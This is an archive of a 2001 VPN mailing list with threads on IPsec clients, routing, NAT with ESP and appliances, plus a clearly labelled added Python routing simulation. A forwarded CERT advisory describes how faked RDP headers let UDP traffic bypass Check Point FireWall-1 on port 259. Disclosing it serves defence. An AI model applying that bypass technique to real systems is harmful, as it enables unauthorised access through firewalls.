From tbird at precision-guesswork.com  Mon Jul  2 15:40:54 2001
From: tbird at precision-guesswork.com (Tina Bird)
Date: Mon, 2 Jul 2001 14:40:54 -0500 (CDT)
Subject: IPsec for Palm
Message-ID:

Does anyone out there have any experience with the Certicom IPsec client
for Palm?  The URL is

http://www.certicom.com/products/movian/movianvpn_tech.html

Thanks for any info -- tbird

VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html
life: http://kubarb.phsx.ukans.edu/~tbird
work: http://www.counterpane.com

VPN is sponsored by SecurityFocus.com

From lists at fips.de  Tue Jul  3 09:44:24 2001
From: lists at fips.de (Philipp Buehler)
Date: Tue, 3 Jul 2001 15:44:24 +0200
Subject: SAP R/3 over IPSec VPN
Message-ID: <20010703154424.A11629@pohl.fips.de>

Hello,

anyone experiences in tunneling SAP R/3 applications over an IPSec based
VPN?  RTT issues?  Latencies ..

TIA, ciao
-- 
Philipp Buehler, aka fips | sysfive.com GmbH | BOfH | NUCH | 
#1: Break the clue barrier!
#2: Already had buzzword confuseritis ?

From tbird at precision-guesswork.com  Tue Jul  3 17:31:10 2001
From: tbird at precision-guesswork.com (Tina Bird)
Date: Tue, 3 Jul 2001 16:31:10 -0500 (CDT)
Subject: IPsec for Palm (fwd)
Message-ID:

VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html
life: http://kubarb.phsx.ukans.edu/~tbird
work: http://www.counterpane.com

---------- Forwarded message ----------
Date: Tue, 3 Jul 2001 14:55:45 -0700
From: Basim Jaber
To: 'Tina Bird'
Subject: RE: IPsec for Palm

Hi Tina,

The Certicom VPN client works really well.  Very easy to use.
Configuration of the supported VPN gateways is straightforward and
documented very well by Certicom.  Deployment was via emailing the client
to users.  Config instructions were simple and users had no problems with
them.  The one thing I wish they had was split tunnelling support for the
WinCE/PocketPC version (they have it for the PalmOS version, though).
Performance was OK.

--Basim

>-----Original Message-----
>From: Tina Bird [mailto:tbird at precision-guesswork.com]
>Sent: Tuesday, July 03, 2001 11:00 AM
>To: Basim Jaber
>Subject: RE: IPsec for Palm
>
>
>your impressions of how it works -- how did you deploy
>it, what did and didn't work, what was performance like,
>etc...
>
>On Mon, 2 Jul 2001, Basim Jaber wrote:
>
>> Date: Mon, 2 Jul 2001 19:49:11 -0700
>> From: Basim Jaber
>> To: 'Tina Bird' , vpn at securityfocus.com
>> Subject: RE: IPsec for Palm
>>
>> Plenty experience here...whatcha need?
>>
>> > -----Original Message-----
>> > From: Tina Bird [mailto:tbird at precision-guesswork.com]
>> > Sent: Monday, July 02, 2001 12:41 PM
>> > To: vpn at securityfocus.com
>> > Subject: IPsec for Palm
>> >
>> >
>> > Does anyone out there have any experience with the
>> > Certicom IPsec client for Palm?  The URL is
>> >
>> > http://www.certicom.com/products/movian/movianvpn_tech.html
>> >
>> > Thanks for any info -- tbird

From l_santimano at yahoo.com  Wed Jul  4 03:38:48 2001
From: l_santimano at yahoo.com (Louella Santimano)
Date: Wed, 4 Jul 2001 00:38:48 -0700 (PDT)
Subject: VPN
Message-ID: <20010704073848.84237.qmail@web12301.mail.yahoo.com>

How do I configure a machine from Network A to go to Network C using an
IP address of Network B.  Network B has VPNs set up to both Network A and
Network C.  What are the required routes and NAT rules?

__________________________________________________
Do You Yahoo!?
Get personalized email addresses from Yahoo! Mail
http://personal.mail.yahoo.com/

From rgm at trusecure.com  Wed Jul  4 14:20:22 2001
From: rgm at trusecure.com (Robert Moskowitz)
Date: Wed, 04 Jul 2001 14:20:22 -0400
Subject: IPsec for Palm
In-Reply-To:
Message-ID: <5.1.0.14.2.20010704133631.01e59cd0@localhost>

At 02:40 PM 7/2/2001 -0500, Tina Bird wrote:
>Does anyone out there have any experience with the
>Certicom IPsec client for Palm?  The URL is
>
>http://www.certicom.com/products/movian/movianvpn_tech.html

Aggressive mode with preshared keys.  Of course, lots of clients use
Aggressive mode, as the alternative is Main Mode with RSA sig (PKI req.).

AFTER you get your PPP connection on your Palm, the demo I saw took about
40 secs to negotiate with D-H group 1.  I think the alternative was D-H
group 4 (ECC, gee now why would certicom use ECC :) that took lots less
time....

Robert Moskowitz
Senior Technical Director
TruSecure Corporation
(248) 968-9809
Fax: (248) 968-2824
rgm at trusecure.com

There's no limit to what can be accomplished if it doesn't matter who
gets the credit

From jonc at haht.com  Thu Jul  5 11:44:05 2001
From: jonc at haht.com (Jon Carnes)
Date: Thu, 5 Jul 2001 11:44:05 -0400
Subject: VPN
References: <20010704073848.84237.qmail@web12301.mail.yahoo.com>
Message-ID: <00e001c10569$52b01160$0b04010a@JCARNES>

----- Original Message -----
>
> How do I configure a machine from Network A to go to
> Network C using an IP address of Network B.
> Network B has VPNs set up to both Network A and
> Network C.  What are the required routes and NAT rules?

Assuming that A and B pass traffic freely, and B and C pass traffic
freely, then this is purely a function of routing.

Each network should have a primary router or "gateway".  You will need to
add two routes:
 - on Network A's gateway, add the C network and point it at B's gateway
   address,
 - on Network C's gateway, add the A network and point it to B's gateway
   address.

Once you have added these two routes, traffic will pass freely from A to
C and back again.

If the gateway machines also run firewall code, then you may need to
modify the rules so that traffic flowing from A to C is allowed, as is
traffic flowing from C to A.

From cgripp at axcelerant.com  Thu Jul  5 13:10:12 2001
From: cgripp at axcelerant.com (Christopher Gripp)
Date: Thu, 5 Jul 2001 10:10:12 -0700
Subject: VPN
Message-ID: <4EBB5C35607E7F48B4AE162D956666EF33907B@guam.corp.axcelerant.com>

Sounds like you are talking about tunnel cascading.  You can think of
tunnel cascading as transitive trusts if you're familiar with Microsoft
lingo (e.g. A=>B, B=>C therefore A=>C).  Without cascading a lot of
routes have to be built.

It all depends on what VPN you are using.  On some, like the RedCreek and
Netscreen, it is an option you can turn on or off and the central VPN
equipment routes it internally.  On others you would have to add the
routes on A, B and C.  (On the central VPN (B) it will unencrypt the
source packets from (A), send it to a router that also needs to have the
routes built out for all the networks, that router will send it back to
the central VPN (B), which will reencrypt it and send it to the
destination.)

So essentially, all parties involved have to know about ALL networks
involved if 'tunnel cascading' isn't an option on the VPN box itself.

Christopher S. Gripp
Systems Engineer
Axcelerant

-----Original Message-----
From: Louella Santimano [mailto:l_santimano at yahoo.com]
Sent: Wednesday, July 04, 2001 12:39 AM
To: vpn at securityfocus.com
Subject: VPN

How do I configure a machine from Network A to go to Network C using an
IP address of Network B.  Network B has VPNs set up to both Network A and
Network C.  What are the required routes and NAT rules?

From lists at fips.de  Fri Jul  6 13:22:38 2001
From: lists at fips.de (Philipp Buehler)
Date: Fri, 6 Jul 2001 19:22:38 +0200
Subject: ipsec "blackbox"
Message-ID: <20010706192238.A26249@pohl.fips.de>

Hi,

since Radguard has stopped, and therefore their very nice
product cIPro is no longer available, I would ask for
similar Products (maybe someone bought the technology/design?).

Key points:
- ASIC based processing (no HDD)
- easy auth from branches (certificate on a little token like a coin)
- fast
- no security breaches in history
- failover management

cIPro did all this and was relatively cheap (box for encrypting 128kbit/s
<<1000 US$)

The only embedded stuff I have found is SonicWall and Watchguard - but
those have been too often on bugtraq, I would call them: development
not really finished.

Any more products like cIPro ?

ciao
-- 
Philipp Buehler, aka fips | sysfive.com GmbH | BOfH | NUCH | 
#1: Break the clue barrier!
#2: Already had buzzword confuseritis ?
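Added example, not taken from any of the posts above and not a
configuration from any vendor mentioned: a small Python routing
simulation for the Network A / Network B / Network C question Louella
raised and Jon Carnes and Christopher Gripp answered.  It models each
gateway's table with longest-prefix matching and walks a packet hop by
hop, showing that A-to-C traffic is delivered only when both of the
extra routes Jon describes are present: with the route on A's gateway
alone, requests reach C but the replies are dropped at C's gateway for
lack of a route back.  The prefixes, gateway names and host addresses
are constructed for the example.

```python
import ipaddress
from typing import Dict, List, Optional, Tuple

# Constructed addressing for the example (not from the thread).
NET_A = ipaddress.ip_network("10.1.0.0/16")
NET_B = ipaddress.ip_network("10.2.0.0/16")
NET_C = ipaddress.ip_network("10.3.0.0/16")

# A routing table: (prefix, next-hop gateway), next hop None = directly connected.
Table = List[Tuple[ipaddress.IPv4Network, Optional[str]]]


def build_tables(route_on_a: bool, route_on_c: bool) -> Dict[str, Table]:
    """Tables for the three gateways.  B already knows A and C because it
    terminates a VPN to each; the two optional entries are the routes Jon
    Carnes says must be added on A's and C's gateways."""
    tables: Dict[str, Table] = {
        "gw_A": [(NET_A, None), (NET_B, "gw_B")],
        "gw_B": [(NET_B, None), (NET_A, "gw_A"), (NET_C, "gw_C")],
        "gw_C": [(NET_C, None), (NET_B, "gw_B")],
    }
    if route_on_a:
        tables["gw_A"].append((NET_C, "gw_B"))   # A's gateway: reach C via B
    if route_on_c:
        tables["gw_C"].append((NET_A, "gw_B"))   # C's gateway: reach A via B
    return tables


def lookup(table: Table, dst: ipaddress.IPv4Address):
    """Longest-prefix match; returns (prefix, next_hop) or None if no route."""
    best = None
    for prefix, next_hop in table:
        if dst in prefix and (best is None or prefix.prefixlen > best[0].prefixlen):
            best = (prefix, next_hop)
    return best


def forward(tables: Dict[str, Table], first_hop: str, dst: str,
            max_hops: int = 8) -> Optional[List[str]]:
    """Hop-by-hop forwarding.  Returns the list of gateways traversed if the
    packet is delivered, None if some gateway has no route or the path loops."""
    dst_ip = ipaddress.ip_address(dst)
    gw, path = first_hop, [first_hop]
    for _ in range(max_hops):
        match = lookup(tables[gw], dst_ip)
        if match is None:
            return None            # no route: this gateway drops the packet
        _, next_hop = match
        if next_hop is None:
            return path            # destination network is directly connected
        gw = next_hop
        path.append(gw)
    return None                    # TTL-style guard against routing loops


def gateway_for(host: str) -> str:
    """The default gateway a host uses, chosen by the network it sits in."""
    ip = ipaddress.ip_address(host)
    for net, gw in ((NET_A, "gw_A"), (NET_B, "gw_B"), (NET_C, "gw_C")):
        if ip in net:
            return gw
    raise ValueError(f"{host} is not in network A, B or C")


def round_trip_works(tables: Dict[str, Table], src: str, dst: str) -> bool:
    """A session needs both directions to route; a one-way route only
    produces requests whose replies are dropped on the way back."""
    out = forward(tables, gateway_for(src), dst)
    back = forward(tables, gateway_for(dst), src)
    return out is not None and back is not None


if __name__ == "__main__":
    host_a, host_c = "10.1.0.50", "10.3.0.7"
    for ra, rc in ((False, False), (True, False), (True, True)):
        t = build_tables(ra, rc)
        print(f"route on A={ra!s:5} route on C={rc!s:5}: "
              f"A->C path={forward(t, 'gw_A', host_c)} "
              f"round trip={round_trip_works(t, host_a, host_c)}")
```

Running it prints the path and the round-trip result for the three
table variants.  The firewall rules on the gateways that Jon mentions
are outside this model; the simulation only shows the routing half of
the answer.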
From tbird at precision-guesswork.com  Fri Jul  6 18:01:30 2001
From: tbird at precision-guesswork.com (Tina Bird)
Date: Fri, 6 Jul 2001 17:01:30 -0500 (CDT)
Subject: IETF drafts
Message-ID:

In revising my USENIX VPN class, I've stumbled across the following
drafts which may be of interest:

"Steps for IPsec Interoperability Testing"
http://www.ietf.org/internet-drafts/draft-hoffman-ipsec-testing-01.txt

"IPsec-NAT Compatibility Requirements"
http://www.ietf.org/internet-drafts/draft-aboba-nat-ipsec-04.txt

"Randomness Requirements for Security"
http://www.ietf.org/internet-drafts/draft-eastlake-randomness2-02.txt

"IPsec NAT-Traversal"
http://www.ietf.org/internet-drafts/draft-stenberg-ipsec-nat-traversal-02.txt

"Extended Authentication within IKE (XAUTH)"
http://www.ietf.org/internet-drafts/draft-beaulieu-ike-xauth-01.txt

"A Hybrid Authentication Mode for IKE"
http://www.ietf.org/internet-drafts/draft-zegman-ike-hybrid-auth-00.txt

I will add these links to the Standards and Crypto sections of the VPN
Web site as appropriate.

enjoy -- tbird

VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html
life: http://kubarb.phsx.ukans.edu/~tbird
work: http://www.counterpane.com

From sandy at storm.ca  Sat Jul  7 00:57:06 2001
From: sandy at storm.ca (Sandy Harris)
Date: Sat, 07 Jul 2001 00:57:06 -0400
Subject: ipsec "blackbox"
References: <20010706192238.A26249@pohl.fips.de>
Message-ID: <3B4696A2.2CE84481@storm.ca>

Philipp Buehler wrote:
> 
> Hi,
> 
> since Radguard has stopped, and therefore their very nice
> product cIPro is no longer available, I would ask for
> similar Products (maybe someone bought the technology/design?).
> 
> Key points:
> - ASIC based processing (no HDD)
> - easy auth from branches (certificate on a little token like a coin)
> - fast
> - no security breaches in history
> - failover management
> 
> cIPro did all this and was relatively cheap (box for encrypting 128kbit/s
> <<1000 US$)
> 
> The only embedded stuff I have found is SonicWall and Watchguard - but
> those have been too often on bugtraq, I would call them: development
> not really finished.
> 
> Any more products like cIPro ?

I don't know if any of them will suit you, but there's a list of
products that use Linux FreeS/WAN IPSEC at:

http://www.freeswan.org/freeswan_trees/freeswan-1.91/doc/intro.html#products

It includes several black box firewall appliance products and a couple of
Linux distributions that run from floppy or CD.

From Dale.Shaw at praxa.com.au  Sun Jul  8 06:06:35 2001
From: Dale.Shaw at praxa.com.au (Shaw, Dale)
Date: Sun, 8 Jul 2001 20:06:35 +1000
Subject: How does this config work?
Message-ID:

Hi all,

I guess questions are usually along the lines of 'how do I get this to
work?'.. well, this one's different.  I've inherited it, it's working,
and I don't really know how :-)

The scenario is this.. PIX firewall running (old) V4.4(1), PC on 'inside'
network with the old 'Cisco Secure VPN Client' (V1.0 or V1.1 - not sure
yet) accessing a host on the Internet over an IPSec VPN.  I don't know
what the peer is, but I presume it's a Cisco somethingorother.

The PC has an RFC1918 address and the PIX *IS* doing NAT.  The PIX has a
'static' IP assignment mapping the internal host's IP to a global address
and although DHCP is in use on the inside network, this particular PC
has a reservation so it's effectively static.

Now, I thought that transport-mode ESP and NAT didn't play well or at
all.. am I missing something?  The PC uses a digital certificate for
authentication if that makes any difference.  I'm investigating this
because I want to tighten up the conduits on the PIX - am I right in
saying that the only conduits I need for this are for ESP from the peer
to the global address of our PC?

Right now there are a bunch of udp/isakmp and esp conduits.

Cheers,
Dale

From tbird at precision-guesswork.com  Sun Jul  8 11:33:37 2001
From: tbird at precision-guesswork.com (Tina Bird)
Date: Sun, 8 Jul 2001 10:33:37 -0500 (CDT)
Subject: How does this config work?
In-Reply-To:
Message-ID:

Hi Dale --

The UDP/ISAKMP conduit on the PIX is allowing the digital certificate
authentication and dynamic key management between the PC and the remote
peer.  It introduces a risk, in that you now have to allow UDP traffic
through your PIX -- but it gives you the benefit of stronger
authentication between the PC and the peer, as well as dynamic key
generation.

As usual the question to consider is which risk concerns you more -- the
risk of an attacker compromising your shared secret and keys if you close
the UDP conduit and revert to shared secrets and manual keying (ick,
IMNSHO), or the risks associated with allowing UDP through your firewall.

Have you taken a look at the PIX documentation in the how-to section of
the VPN web page?  It might help to compare what you've got to another
configuration.

cheers -- tbird

On Sun, 8 Jul 2001, Shaw, Dale wrote:

> Date: Sun, 8 Jul 2001 20:06:35 +1000
> From: "Shaw, Dale"
> To: vpn at securityfocus.com
> Subject: How does this config work?
>
> Hi all,
>
> I guess questions are usually along the lines of 'how do I get this to
> work?'.. well, this one's different.  I've inherited it, it's working,
> and I don't really know how :-)
>
> The scenario is this.. PIX firewall running (old) V4.4(1), PC on 'inside'
> network with the old 'Cisco Secure VPN Client' (V1.0 or V1.1 - not sure
> yet) accessing a host on the Internet over an IPSec VPN.  I don't know
> what the peer is, but I presume it's a Cisco somethingorother.
>
> The PC has an RFC1918 address and the PIX *IS* doing NAT.  The PIX has a
> 'static' IP assignment mapping the internal host's IP to a global address
> and although DHCP is in use on the inside network, this particular PC
> has a reservation so it's effectively static.
>
> Now, I thought that transport-mode ESP and NAT didn't play well or at
> all.. am I missing something?  The PC uses a digital certificate for
> authentication if that makes any difference.  I'm investigating this
> because I want to tighten up the conduits on the PIX - am I right in
> saying that the only conduits I need for this are for ESP from the peer
> to the global address of our PC?
>
> Right now there are a bunch of udp/isakmp and esp conduits.
>
> Cheers,
> Dale
>

VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html
life: http://kubarb.phsx.ukans.edu/~tbird
work: http://www.counterpane.com

From Dale.Shaw at praxa.com.au  Sun Jul  8 18:36:50 2001
From: Dale.Shaw at praxa.com.au (Shaw, Dale)
Date: Mon, 9 Jul 2001 08:36:50 +1000
Subject: How does this config work?
Message-ID:

Tina,

Thanks for the reply.  Sorry if this is redundant, but re-reading my
original message I could've made the scenario clearer.  The PC/IPSec
-client- is *behind* the PIX, on its 'inside' network and is making a
connection through it, outwards, to a peer on the Internet.  There are
no restrictions on outgoing traffic and there is no requirement for
connections originating from the Internet to connect to a VPN gateway
behind the PIX.

Looking at the PIX example on the HOW-TO page, I'm not sure if this
example is for my scenario or for a situation where clients connect to
a VPN gateway located behind the PIX.  In either scenario, I can
understand why I would need the conduit for ESP, but why is it that a
conduit for UDP/ISAKMP is required?  Shouldn't the PIX take care of
setting up a state entry for outgoing destination udp/500 so that only
source udp/500 packets from the peer in question can come back?

Back to the original issue - I thought Transport-mode ESP was
troublesome with NAT.  The page;
http://www.linuxdoc.org/HOWTO/VPN-Masquerade-HOWTO-6.html lists
some/all of the drawbacks.  Here's the paragraph that makes me wonder
how my setup is working at all..

"IPsec traffic using transport-mode ESP also cannot be reliably
masqueraded.  Transport mode ESP essentially encrypts everything after
the IP header.  Since, for example, the TCP and UDP checksums include
the IP source and destination addresses, and the TCP/UDP checksum is
within the encrypted payload and thus cannot be recalculated after the
masquerade gateway alters the IP addresses, the TCP/UDP header will
fail the checksum test at the remote gateway and the packet will be
discarded.  Protocols that do not include information about the source
or destination IP addresses may successfully use masqueraded transport
mode."

We're not using PAT.. we're doing many:many - could this be a factor?

Thanks,
Dale

> -----Original Message-----
> From: Tina Bird [mailto:tbird at precision-guesswork.com]
> Sent: Monday, July 09, 2001 1:34 AM
> To: Shaw, Dale
> Cc: vpn at securityfocus.com
> Subject: Re: How does this config work?
>
>
> Hi Dale --
>
> The UDP/ISAKMP conduit on the PIX is allowing the
> digital certificate authentication and dynamic
> key management between the PC and the remote peer.
> It introduces a risk, in that you now have to allow
> UDP traffic through your PIX -- but it gives you the
> benefit of stronger authentication between the PC
> and the peer, as well as dynamic key generation.
>
> As usual the question to consider is which risk
> concerns you more -- the risk of an attacker
> compromising your shared secret and keys if you
> close the UDP conduit and revert to shared secrets
> and manual keying (ick, IMNSHO), or the risks
> associated with allowing UDP through your firewall.
>
> Have you taken a look at the PIX documentation in the
> how-to section of the VPN web page?  It might help to
> compare what you've got to another configuration.
>
> cheers -- tbird
>
> On Sun, 8 Jul 2001, Shaw, Dale wrote:
>
> > Date: Sun, 8 Jul 2001 20:06:35 +1000
> > From: "Shaw, Dale"
> > To: vpn at securityfocus.com
> > Subject: How does this config work?
> >
> > Hi all,
> >
> > I guess questions are usually along the lines of 'how do I get this to
> > work?'.. well, this one's different.  I've inherited it, it's working,
> > and I don't really know how :-)
> >
> > The scenario is this.. PIX firewall running (old) V4.4(1), PC on 'inside'
> > network with the old 'Cisco Secure VPN Client' (V1.0 or V1.1 - not sure
> > yet) accessing a host on the Internet over an IPSec VPN.  I don't know
> > what the peer is, but I presume it's a Cisco somethingorother.
> >
> > The PC has an RFC1918 address and the PIX *IS* doing NAT.  The PIX has a
> > 'static' IP assignment mapping the internal host's IP to a global address
> > and although DHCP is in use on the inside network, this particular PC
> > has a reservation so it's effectively static.
> >
> > Now, I thought that transport-mode ESP and NAT didn't play well or at
> > all.. am I missing something?  The PC uses a digital certificate for
> > authentication if that makes any difference.  I'm investigating this
> > because I want to tighten up the conduits on the PIX - am I right in
> > saying that the only conduits I need for this are for ESP from the peer
> > to the global address of our PC?
> >
> > Right now there are a bunch of udp/isakmp and esp conduits.
> > > > Cheers, > > Dale > > > > VPN is sponsored by SecurityFocus.com > > > > VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html > life: http://kubarb.phsx.ukans.edu/~tbird > work: http://www.counterpane.com > VPN is sponsored by SecurityFocus.com From paul at moquijo.com Sun Jul 8 20:01:16 2001 From: paul at moquijo.com (Paul Cardon) Date: Sun, 08 Jul 2001 20:01:16 -0400 Subject: How does this config work? References: Message-ID: <3B48F44C.20BCAD3@moquijo.com> "Shaw, Dale" wrote: > > Thanks for the reply. Sorry if this is redundant, but re-reading my > original message I could've made the scenario clearer. The PC/IPSec > -client- is *behind* the PIX, on its 'inside' network and is making a > connection through it, outwards, to a peer on the Internet. There are > no restrictions on outgoing traffic and there is no requirement for > connections originating from the Internet to connect to a VPN gateway > behind the PIX. Which side of the firewall the ipsec "client" and "server" are on and type of NAT are really not relevant to what is going on. The fact is you are traversing a NAT device which modifies packet headers causing problems with AH and transport mode ESP. > Looking at the PIX example on the HOW-TO page, I'm not sure if this > example is for my scenario or for a situation where clients connect to > a VPN gateway located behind the PIX. In either scenario, I can > understand why I would need the conduit for ESP, but why is it that a > conduit for UDP/ISAKMP is required? Shouldn't the PIX take care of > setting up a state entry for outgoing destination udp/500 so that only > source udp/500 packets from the peer in question can come back? The PIX does what you are describing as far as keeping state entries but your client is doing ESP in UDP encapsulation so that the ESP can survive NAT. It must also do UDP encapsulation on the ISAKMP. The association is being created for the original ESP packet not the encapsulated ESP. 
The original ISAKMP packet also needs to be preserved so that IP addresses and such in the IKE and ESP packets match. The Cisco client works this way. > Back to the original issue - I thought Transport-mode ESP was > troublesome with NAT. The page; > http://www.linuxdoc.org/HOWTO/VPN-Masquerade-HOWTO-6.html lists > some/all of the drawbacks. Here's the paragraph that makes me wonder > how my setup is working at all.. > > "IPsec traffic using transport-mode ESP also cannot be reliably > masqueraded. Transport mode ESP essentially encrypts everything after > the IP header. Since, for example, the TCP and UDP checksums include > the IP source and destination addresses, and the TCP/UDP checksum is > within the encrypted payload and thus cannot be recalculated after the > masquerade gateway alters the IP addresses, the TCP/UDP header will > fail the checksum test at the remote gateway and the packet will be > discarded. Protocols that do not include information about the source > or destination IP addresses may successfully use masqueraded transport > mode." The UDP encapsulation avoids that problem because the NAT affects only the UDP header and there is no modification of the original ESP packet. It will still have your non-translated, private side IP address in its header so that the encrypted TCP checksum is not affected. If you want a reference that describes how it works in gory detail, check out: http://www.ietf.org/internet-drafts/draft-ietf-ipsec-udp-encaps-00.txt Dale, I hope I've explained it reasonably clearly. -paul VPN is sponsored by SecurityFocus.com From paul at moquijo.com Sun Jul 8 20:53:10 2001 From: paul at moquijo.com (Paul Cardon) Date: Sun, 08 Jul 2001 20:53:10 -0400 Subject: How does this config work? References: <3B48F44C.20BCAD3@moquijo.com> Message-ID: <3B490076.AE110E56@moquijo.com> I'm correcting myself... 
Ughh Paul Cardon wrote: > > > Looking at the PIX example on the HOW-TO page, I'm not sure if this > > example is for my scenario or for a situation where clients connect to > > a VPN gateway located behind the PIX. In either scenario, I can > > understand why I would need the conduit for ESP, but why is it that a > > conduit for UDP/ISAKMP is required? Shouldn't the PIX take care of > > setting up a state entry for outgoing destination udp/500 so that only > > source udp/500 packets from the peer in question can come back? The conduit is only for inbound connections and would be needed for both IKE and ESP. In your scenario, where you are going outbound, it isn't used for any of the protocols. > The PIX does what you are describing as far as keeping state entries but > your client is doing ESP in UDP encapsulation so that the ESP can > survive NAT. It must also do UDP encapsulation on the ISAKMP. The > association is being created for the original ESP packet not the > encapsulated ESP. The original ISAKMP packet also needs to be preserved > so that IP addresses and such in the IKE and ESP packets match. The > Cisco client works this way. I also blew it on this part. The IKE on UDP port 500 is not further encapsulated in UDP to traverse a NAT device. That's what I get for scanning the draft document instead of re-reading that part carefully before responding. In any case, AH, ESP tunnel, and ESP transport can all be made to survive NAT using UDP encapsulation as described in the draft document. -paul VPN is sponsored by SecurityFocus.com From je at sekure.net Mon Jul 9 05:26:02 2001 From: je at sekure.net (Jonas Eriksson) Date: Mon, 9 Jul 2001 11:26:02 +0200 (CEST) Subject: IPSec between PIX and the Nokia CC500 Message-ID: Hi, Has anyone information to share about the subject? 
(IKE + IPSec) Regards Jonas VPN is sponsored by SecurityFocus.com From lrandall at isa-inc.com Mon Jul 9 15:43:42 2001 From: lrandall at isa-inc.com (Liam Randall) Date: Mon, 9 Jul 2001 15:43:42 -0400 Subject: FW: CERT Advisory CA-2001-17 Message-ID: <7683FAEA15B8804E885367DD0F0DE1CE9DCD@Exchange.isa-inc.com> Everyone catch this yet: -----Original Message----- From: CERT Advisory [mailto:cert-advisory at cert.org] Sent: Monday, July 09, 2001 1:33 PM To: cert-advisory at cert.org Subject: CERT Advisory CA-2001-17 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-17 Check Point RDP Bypass Vulnerability Original release date: July 09, 2001 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Check Point VPN-1 and FireWall-1 Version 4.1 Overview A vulnerability in Check Point FireWall-1 and VPN-1 may allow an intruder to pass traffic through the firewall on port 259/UDP. I. Description Inside Security GmbH has discovered a vulnerability in Check Point FireWall-1 and VPN-1 that allows an intruder to bypass the firewall. The default FireWall-1 management rules allow arbitrary RDP (Reliable Data Protocol) connections to traverse the firewall. RFC-908 and RFC-1151 describe the Reliable Data Protocol (RDP). Quoting from RFC-908: The Reliable Data Protocol (RDP) is designed to provide a reliable data transport service for packet-based applications such as remote loading and debugging. RDP was designed to have much of the same functionality as TCP, but it has some advantages over TCP in certain situations. FireWall-1 and VPN-1 include support for RDP, but they do not provide adequate security controls. Quoting from the advisory provided by Inside Security GmbH: By adding a faked RDP header to normal UDP traffic any content can be passed to port 259 on any remote host on either side of the firewall. 
For more information, see the Inside Security GmbH security advisory, available at http://www.inside-security.de/advisories/fw1_rdp.html Although the CERT/CC has not seen any incident activity related to this vulnerability, we do recommend that all affected sites upgrade their Check Point software as soon as possible. II. Impact An intruder can pass UDP traffic with arbitrary content through the firewall on port 259 in violation of implied security policies. If an intruder can gain control of a host inside the firewall, he may be able to use this vulnerability to tunnel arbitrary traffic across the firewall boundary. Additionally, even if an intruder does not have control of a host inside the firewall, he may be able to use this vulnerability as a means of exploiting another vulnerability in software listening passively on the internal network. Finally, an intruder may be able to use this vulnerability to launch certain kinds of denial-of-service attacks. III. Solutions Install a patch from Check Point Software Technologies. More information is available in Appendix A. Until a patch can be applied, you may be able to reduce your exposure to this vulnerability by configuring your router to block access to 259/UDP at your network perimeter. Appendix A Check Point Check Point has issued an alert for this vulnerability at http://www.checkpoint.com/techsupport/alerts/ Download the patch from Check Point's web site: http://www.checkpoint.com/techsupport/downloads.html Appendix B. - References 1. http://www.inside-security.de/advisories/fw1_rdp.html 2. http://www.kb.cert.org/vuls/id/310295 3. http://www.ietf.org/rfc/rfc908.txt 4. http://www.ietf.org/rfc/rfc1151.txt _________________________________________________________________ Our thanks to Inside Security GmbH for the information contained in their advisory. _________________________________________________________________ This document was written by Ian A. Finlay. 
If you have feedback concerning this document, please send email to: mailto:cert at cert.org?Subject=Feedback CA-2001-17 [VU#310295] Copyright 2001 Carnegie Mellon University. Revision History July 09, 2001: Initial Release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBO0njBQYcfu8gsZJZAQHOCAP+L8JEWTsWqvWjZQaVpHPb6GHn7D837lzc rE/ef50+6xSzRZyBPXQ8+3N6JqYk8PBufYCcqtiqL1PfNJw3YfrGJ5irzS4ENXTg mupUNTfdG0UhEAOWJbsjykfB0K/PPaeFrtf1jod1zd9uKPIFytHLAzMHWzUwTTtW 4qSlIxoiHEQ= =v8vs -----END PGP SIGNATURE----- VPN is sponsored by SecurityFocus.com From tbird at precision-guesswork.com Mon Jul 9 13:58:56 2001 From: tbird at precision-guesswork.com (Tina Bird) Date: Mon, 9 Jul 2001 12:58:56 -0500 (CDT) Subject: Network Alchemy / Nokia CryptoCluster 500 boxes (fwd) Message-ID: VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html life: http://kubarb.phsx.ukans.edu/~tbird work: http://www.counterpane.com ---------- Forwarded message ---------- Date: Sun, 8 Jul 2001 17:42:07 -0700 From: Jon Callas To: Tina Bird Subject: Network Alchemy / Nokia CryptoCluster 500 boxes I picked up a pair Network Alchemy / Nokia CryptoCluster 500 boxes in a failed dot-com selloff. They are about nine months old, and are the cool Network Alchemy black, rather than Nokia beige. They do IPsec, very cool address and port translation, and other things. They can be used as a redundant cluster with failover, or as two ends of a tunnel. They can handle up to 100 connections. Software including a windows IPsec client is available on the web. A CA for IPsec certs comes along with it, too. They list for $1250 each. I'm willing to sell one for $350 or the pair for $600. I'm selling because don't really need two of them. 
Information is available at and Jon VPN is sponsored by SecurityFocus.com From guy.raymakers at eds.com Tue Jul 10 02:27:49 2001 From: guy.raymakers at eds.com (Raymakers, Guy) Date: Tue, 10 Jul 2001 07:27:49 +0100 Subject: IPSec between PIX and the Nokia CC500 Message-ID: What we are doing is IPSec between Cisco IOS IPSec and CC500's. It's working fine, only there's one little problem in case the IPSec sessions get out of sync (e.g. reboot of the central system while the lifetime of some sessions is not yet expired...) . Then it might be needed to manually clear the sessions at one end. -----Original Message----- From: Jonas Eriksson [mailto:je at sekure.net] Sent: Monday, July 09, 2001 11:26 To: vpn at securityfocus.com Subject: IPSec between PIX and the Nokia CC500 Hi, Has anyone information to share about the subject? (IKE + IPSec) Regards Jonas VPN is sponsored by SecurityFocus.com VPN is sponsored by SecurityFocus.com From tim at starlipers.com Mon Jul 9 23:31:44 2001 From: tim at starlipers.com (Robert Starliper) Date: Mon, 9 Jul 2001 23:31:44 -0400 Subject: CERT Advisory CA-2001-17 Message-ID: Liam, Et. Al - There is an update to this notice - here is a post from Inside Security I just read on Bugtraq.... ---------------------------------------------------Begin Forwarded Message---------------------------------------------------------- Urgent! There is a slight mistake in Revision 1.2 of this advisory. RDP is proprietary protocol used by CheckPoint and therefore not described by RFC908, this RFC describes a different protocol unfortunately also called "RDP". 
Here is the corrected version:

FOR PUBLIC RELEASE
------------------------------------------------------------------------
Inside Security GmbH Vulnerability Notification
Revision 1.3
2001-07-09
------------------------------------------------------------------------
The latest version of this document is available at
